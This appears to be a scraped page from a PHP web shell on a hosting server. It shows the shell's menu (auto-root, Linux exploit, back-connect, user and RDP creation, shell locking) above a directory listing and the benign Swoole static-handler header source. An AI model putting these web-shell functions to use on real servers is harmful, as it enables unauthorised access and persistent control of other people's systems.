Linux premium134.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.104 | : 216.73.216.11
Cant Read [ /etc/named.conf ]
?8.1.34
mfbsrygq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
alt /
php83 /
usr /
include /
php /
ext /
swoole /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
swoole.h
26.96
KB
-rw-r--r--
swoole_api.h
2.02
KB
-rw-r--r--
swoole_asm_context.h
2.31
KB
-rw-r--r--
swoole_async.h
3.29
KB
-rw-r--r--
swoole_atomic.h
2.3
KB
-rw-r--r--
swoole_base64.h
1.3
KB
-rw-r--r--
swoole_buffer.h
2.24
KB
-rw-r--r--
swoole_channel.h
2.37
KB
-rw-r--r--
swoole_client.h
11.75
KB
-rw-r--r--
swoole_config.h
8.79
KB
-rw-r--r--
swoole_coroutine.h
8.92
KB
-rw-r--r--
swoole_coroutine_api.h
5.12
KB
-rw-r--r--
swoole_coroutine_channel.h
4.17
KB
-rw-r--r--
swoole_coroutine_context.h
2.75
KB
-rw-r--r--
swoole_coroutine_socket.h
17.64
KB
-rw-r--r--
swoole_coroutine_system.h
3.78
KB
-rw-r--r--
swoole_dtls.h
2.42
KB
-rw-r--r--
swoole_error.h
6.46
KB
-rw-r--r--
swoole_file.h
4.88
KB
-rw-r--r--
swoole_file_hook.h
2.76
KB
-rw-r--r--
swoole_hash.h
1.24
KB
-rw-r--r--
swoole_heap.h
1.9
KB
-rw-r--r--
swoole_http.h
7.24
KB
-rw-r--r--
swoole_http2.h
8.55
KB
-rw-r--r--
swoole_iouring.h
5.52
KB
-rw-r--r--
swoole_llhttp.h
2.02
KB
-rw-r--r--
swoole_lock.h
3.25
KB
-rw-r--r--
swoole_log.h
15.71
KB
-rw-r--r--
swoole_lru_cache.h
3.18
KB
-rw-r--r--
swoole_memory.h
2.83
KB
-rw-r--r--
swoole_message_bus.h
5.18
KB
-rw-r--r--
swoole_mime_type.h
1.42
KB
-rw-r--r--
swoole_mqtt.h
2.16
KB
-rw-r--r--
swoole_msg_queue.h
1.96
KB
-rw-r--r--
swoole_pipe.h
2.6
KB
-rw-r--r--
swoole_process_pool.h
13.17
KB
-rw-r--r--
swoole_protocol.h
5.03
KB
-rw-r--r--
swoole_proxy.h
3.3
KB
-rw-r--r--
swoole_reactor.h
12.4
KB
-rw-r--r--
swoole_redis.h
1.83
KB
-rw-r--r--
swoole_server.h
49.72
KB
-rw-r--r--
swoole_signal.h
2.99
KB
-rw-r--r--
swoole_socket.h
18.51
KB
-rw-r--r--
swoole_socket_hook.h
2.31
KB
-rw-r--r--
swoole_socket_impl.h
1.43
KB
-rw-r--r--
swoole_ssl.h
5.22
KB
-rw-r--r--
swoole_static_handler.h
5.21
KB
-rw-r--r--
swoole_string.h
7.32
KB
-rw-r--r--
swoole_table.h
6.5
KB
-rw-r--r--
swoole_thread.h
1.99
KB
-rw-r--r--
swoole_timer.h
4.37
KB
-rw-r--r--
swoole_uring_socket.h
3.84
KB
-rw-r--r--
swoole_util.h
7.49
KB
-rw-r--r--
swoole_version.h
1.74
KB
-rw-r--r--
swoole_websocket.h
5.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : swoole_static_handler.h
/* +----------------------------------------------------------------------+ | Swoole | +----------------------------------------------------------------------+ | This source file is subject to version 2.0 of the Apache license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | http://www.apache.org/licenses/LICENSE-2.0.html | | If you did not receive a copy of the Apache2.0 license and are unable| | to obtain it through the world-wide-web, please send a note to | | license@swoole.com so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Author: Tianfeng Han <rango@swoole.com> | +----------------------------------------------------------------------+ */ #pragma once #include "swoole_server.h" #include "swoole_http.h" #include "swoole_mime_type.h" #include <string> #include <set> namespace swoole { namespace http_server { struct RewriteRule { std::string pattern; std::string replacement; bool is_regex; }; class StaticHandler { private: Server *serv; std::string request_url; std::string original_url; std::string dir_path; std::set<std::string> dir_files; std::string index_file; typedef struct { off_t offset; size_t length; char part_header[SW_HTTP_SERVER_PART_HEADER]; } task_t; std::vector<task_t> tasks; size_t l_filename = 0; char filename[PATH_MAX]; struct stat file_stat; bool last = false; std::string content_type; std::string boundary; std::string end_part; size_t content_length = 0; public: int status_code = SW_HTTP_OK; StaticHandler(Server *_server, const char *url, size_t url_length) : request_url(url, url_length), original_url(url, url_length) { serv = _server; } /** * @return true: continue to execute backwards * @return false: break static handler */ bool try_serve(); bool try_serve_index_file(); bool is_modified(const std::string &date_if_modified_since) const; bool is_modified_range(const std::string &date_range) const; size_t make_index_page(String *buffer); bool get_dir_files(); bool set_filename(const std::string &filename); bool catch_error() { if (last) { status_code = SW_HTTP_NOT_FOUND; return true; } else { return false; } } bool has_index_file() const { return !index_file.empty(); } bool is_enabled_auto_index() const { return serv->http_autoindex; } static std::string get_date(); time_t get_file_mtime() const { #ifdef __MACH__ return file_stat.st_mtimespec.tv_sec; #else return file_stat.st_mtim.tv_sec; #endif } std::string get_date_last_modified() const; const char *get_filename() const { return filename; } const std::string &get_request_url() const { return request_url; } void set_request_url(const std::string &rewritten_url) { request_url = rewritten_url; } const std::string &get_boundary() { if (boundary.empty()) { boundary = std::string(SW_HTTP_SERVER_BOUNDARY_PREKEY); swoole_random_string(boundary, SW_HTTP_SERVER_BOUNDARY_TOTAL_SIZE - sizeof(SW_HTTP_SERVER_BOUNDARY_PREKEY)); } return boundary; } const std::string &get_content_type() { if (tasks.size() > 1) { content_type = std::string("multipart/byteranges; boundary=") + get_boundary(); return content_type; } else { return get_mimetype(); } } const std::string &get_mimetype() const { return mime_type::get(get_filename()); } std::string get_filename_std_string() { return {filename, l_filename}; } bool get_absolute_path(); const std::string &get_original_url() const { return original_url; } size_t get_filesize() const { return file_stat.st_size; } const std::vector<task_t> &get_tasks() { return tasks; } bool is_dir() const { return S_ISDIR(file_stat.st_mode); } bool is_link() const { return S_ISLNK(file_stat.st_mode); } bool is_file() const { return S_ISREG(file_stat.st_mode); } bool is_absolute_path() { return swoole_strnpos(filename, l_filename, SW_STRL("..")) == -1; } bool is_located_in_document_root() { const std::string &document_root = serv->get_document_root(); const size_t l_document_root = document_root.length(); return l_filename > l_document_root && filename[l_document_root] == '/' && swoole_str_starts_with(filename, l_filename, document_root.c_str(), l_document_root); } size_t get_content_length() const { return content_length; } const std::string &get_end_part() { return end_part; } void parse_range(const char *range, const char *if_range); }; }; // namespace http_server }; // namespace swoole
Close